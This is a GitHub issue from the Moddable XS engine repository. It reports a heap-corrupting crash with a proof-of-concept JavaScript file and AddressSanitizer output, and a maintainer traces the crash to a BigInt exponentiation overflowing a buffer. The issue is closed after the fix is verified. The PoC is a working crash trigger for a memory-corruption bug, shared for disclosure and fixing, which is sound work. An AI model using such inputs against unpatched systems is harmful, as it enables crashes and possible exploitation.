Moddable-OpenSource/moddable #797: SEGV xsMemory.c:947 in fxMarkValue

jessysaurusrex, 2022-01-24:
### Version: 
[eecb298fb1d9019854591515664e369ad9cf5b53](https://github.com/Moddable-OpenSource/moddable/tree/eecb298fb1d9019854591515664e369ad9cf5b53)

### poc.js
```js
function main() {
const v2 = Symbol.split;
const v3 = [-1000000000000.0,-1000000000000.0,-1000000000000.0];
const v6 = 2147483648n << 1000n;
const v8 = 268435456n ** v6;
const v9 = {};
const v10 = [v9,v9,v9,v3,v9];
function v11(v12,v13) {
    'use strict';
    const v14 = [];
    function* v17(v18,v19,...v20) {
        const v21 = 36251;
        const v22 = 9;
        const v23 = -734507737 & v2;
        const v24 = [v23,v14];
        const v25 = v18(Object,v23,v12);
    }
    const v26 = v17(-734507737);
    const v27 = v11();
}
const v29 = new Promise(v11);
}
main();
```

### Invocation `xst poc.js`
```
STDERR: 
/Users/amulet/moddable/xs/sources/xsScript.c:203:16: runtime error: left shift of 1327365517 by 1 places cannot be represented in type 'txSize' (aka 'int')
SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior /Users/amulet/moddable/xs/sources/xsScript.c:203:16 in 
/Users/amulet/moddable/xs/sources/xsLexical.c:333:21: runtime error: 1e+12 is outside the range of representable values of type 'int'
SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior /Users/amulet/moddable/xs/sources/xsLexical.c:333:21 in 
/Users/amulet/moddable/xs/sources/xsMemory.c:947:3: runtime error: applying non-zero offset 18446744073709551600 to null pointer
SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior /Users/amulet/moddable/xs/sources/xsMemory.c:947:3 in 
AddressSanitizer:DEADLYSIGNAL
=================================================================
==90824==ERROR: AddressSanitizer: SEGV on unknown address 0xfffffffffffffff0 (pc 0x000102466d38 bp 0x000102466cc8 sp 0x00016dc55e20 T0)
==90824==The signal is caused by a UNKNOWN memory access.
    #0 0x102466d38 in fxMarkValue xsMemory.c:947

==90824==Register values:
 x[0] = 0x000000016dc55d30   x[1] = 0x0000000000000000   x[2] = 0x0000000000000000   x[3] = 0x000000010c100f40  
 x[4] = 0x6a6cb03abcebc041   x[5] = 0x0000000000000000   x[6] = 0x0000000000000000   x[7] = 0x0000000000000000  
 x[8] = 0x0000000000000000   x[9] = 0x0000000000000000  x[10] = 0x00000000000f5260  x[11] = 0x0000000000000004  
x[12] = 0x0000000000000000  x[13] = 0x00000001035bf350  x[14] = 0x0000000000000000  x[15] = 0x0000000000000000  
x[16] = 0x0000000305ddc5fc  x[17] = 0x00000001034d40b8  x[18] = 0x0000000000000000  x[19] = 0x000000016dc59660  
x[20] = 0x00000001029c2a58  x[21] = 0x0000000102ffc070  x[22] = 0x0000000000000000  x[23] = 0x0000000000000000  
x[24] = 0x0000000000000000  x[25] = 0x0000000000000000  x[26] = 0x0000000000000000  x[27] = 0x0000000000000000  
x[28] = 0x0000000000000000     fp = 0x000000016dc56bd0     lr = 0x0000000102466cc8     sp = 0x000000016dc55e20  
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV xsMemory.c:947 in fxMarkValue
==90824==ABORTING

Status: 
pid 90824 SIGABRT (signal 6)
```

phoddie, 2022-01-25:
The issue here is triggered by the calculation of `268435456n ** (2147483648n << 1000n)`. `fxBigInt_exp` overflows the output buffer, corrupting the heap. Subsequent execution fails in various ways as a result.

jessysaurusrex, 2022-02-02:
Verified fixed in `fb7b2c2`

closed 2022-02-02 by jessysaurusrex